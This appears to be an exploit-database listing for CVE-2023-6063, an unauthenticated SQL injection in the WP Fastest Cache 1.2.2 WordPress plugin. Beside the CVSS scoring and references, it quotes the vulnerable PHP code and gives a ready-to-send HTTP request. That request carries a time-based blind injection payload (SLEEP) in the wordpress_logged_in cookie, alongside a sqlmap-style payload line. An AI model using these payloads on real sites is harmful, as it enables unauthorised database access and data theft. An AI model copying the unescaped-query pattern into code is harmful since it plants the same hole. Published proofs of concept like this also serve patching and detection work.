WordPress WP Fastest Cache 1.2.2 SQL Injection Vulnerability

2024-02-2800:00:00

Meryem Taskin

0day.today

175

wordpress

fastest cache

vulnerability

unauthenticated

sql injection

security advisory

cve-2023-6063

meryem taşkın

alex sanford

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

8.7

Confidence

Low

EPSS

0.127

Percentile

95.6%

JSON

WordPress WP Fastest Cache plugin version 1.2.2 suffers from an unauthenticated remote SQL injection vulnerability.

# Exploit Title: Unauthenticated SQL Injection in WP Fastest Cache 1.2.2
# Exploit Author: Meryem Taşkın
# Vendor Homepage: https://www.wpfastestcache.com/
# Software Link: https://wordpress.org/plugins/wp-fastest-cache/
# Version: WP Fastest Cache 1.2.2
# Tested on: WP Fastest Cache 1.2.2
# CVE: CVE-2023-6063
 
## Description
An SQL injection vulnerability exists in version 1.2.2 of the WP Fastest Cache plugin, allowing an attacker to trigger SQL queries on the system without authentication.
 
## Vuln Code
 
public function is_user_admin(){
            global $wpdb;
            foreach ((array)$_COOKIE as $cookie_key => $cookie_value){
                if(preg_match("/wordpress_logged_in/i", $cookie_key)){ 
                    $username = preg_replace("/^([^\|]+)\|.+/", "$1", $cookie_value); 
                    break;
                }
            }
            if(isset($username) && $username){            
                $res = $wpdb->get_var("SELECT `$wpdb->users`.`ID`, `$wpdb->users`.`user_login`, `$wpdb->usermeta`.`meta_key`, `$wpdb->usermeta`.`meta_value`
                                       FROM `$wpdb->users`
                                       INNER JOIN `$wpdb->usermeta`
                                       ON `$wpdb->users`.`user_login` = \"$username\" AND  # $username varible is not escaped vulnerable to SQL injection
                                       .....
 
## Exploit
GET / HTTP/1.1
Cookie: wordpress_logged_in_1=%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29A%29%20AND%20%221%22%3D%221
Host: meryem.local
 
## Parameter: Cookie #1* ((custom) HEADER)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: wordpress_logged_in_dsadasdasd=" AND (SELECT 3809 FROM (SELECT(SLEEP(5)))RDVP) AND "HQDg"="HQDg
---
 
## References
- [WPScan Blog Post](https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/)
- [WPScan Vulnerability](https://wpscan.com/vulnerability/30a74105-8ade-4198-abe2-1c6f2967443e/)
- [CVE-2023-6063](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6063)
 
## Credits
- Original Researcher: Alex Sanford
- PoC: Meryem Taşkın